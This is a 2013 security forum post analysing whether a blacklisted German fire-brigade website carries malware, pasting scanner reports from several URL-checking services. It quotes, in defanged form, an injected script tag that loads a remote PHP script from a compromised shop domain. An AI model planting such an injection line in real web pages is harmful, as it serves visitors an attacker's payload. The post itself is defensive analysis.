Author Topic: Blacklisted site clean or with MW:ANOMALY:SP8  (Read 1945 times)

Offline polonus

Blacklisted site clean or with MW:ANOMALY:SP8
« on: November 30, 2013, 06:45:45 PM »
See: http://maldb.com/feuerwehr-rossla.de/#blacklists
See: https://www.virustotal.com/nl/url/8f11788d3542b2a22d794a9e220e5a590454014f08b54577b3fa05c50672fc79/analysis/
No detections here: http://urlquery.net/report.php?id=8076586
jsunpack scan here: http://jsunpack.jeek.org/?report=3da626169579d0916c2a3378e28619b8f9c11229
See code hiccup: ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js benign
[nothing detected] (script) ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
     status: (referer=feuerwehr-rossla.de/)saved 55740 bytes 4a17c73d94831fe9c67af02550ecdc639681ddbb
     info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: invalid flag after regular expression:
          error: line:3: s,"form")?jQuery.makeArray(this.elements):this;}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password/i.test(this.type));}).map(function(i,elem){var val=jQuery(this).val();return
          error: line:3: ^
     suspicious:

Injection Check -> Suspicious Text after HTML

<script src="htxp://simplechic.pl/translations/x1cuodn3.php?id=52520410" type="text/javascript"></script>
See: simplechic dot pl/modules/menu/js/superfish-modified.js benign
[nothing detected] (script) simplechic.pl/modules/menu/js/superfish-modified.js
     status: (referer=simplechic dot pl/)saved 3765 bytes ccaa5ae25a9f3744dfcc7f68896782755f19712d
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.fn
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.fn = 1;
          error: line:1: ....^
     suspicious: Location: htxp://simplechic.pl/pl/
Note: This line has redirected the request to htxp://simplechic.pl/pl/ -> The connection timed out before all (any?) content was returned!

Suspicious: simplechic dot pl/modules/productscategory/productscategory.js benign
[nothing detected] (script) simplechic dot pl/modules/productscategory/productscategory.js
     status: (referer=simplechic dot pl/pl/)saved 1931 bytes 383c64bce6a9e70599fac4571fdcd15bbaec9786
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     suspicious:  found as benign here: http://zulu.zscaler.com/submission/show/5e67e586563ba033987021d87c4634b2-1385833221
PrestaShop vulnerable to random pages and exploitable: http://www.cvedetails.com/vulnerability-list/vendor_id-8950/Prestashop.html

Here the site is given as blacklisted and with malware: http://sitecheck.sucuri.net/results/feuerwehr-rossla.de/
Blocked by Google Safebrowsing: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=feuerwehr-rossla.de

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!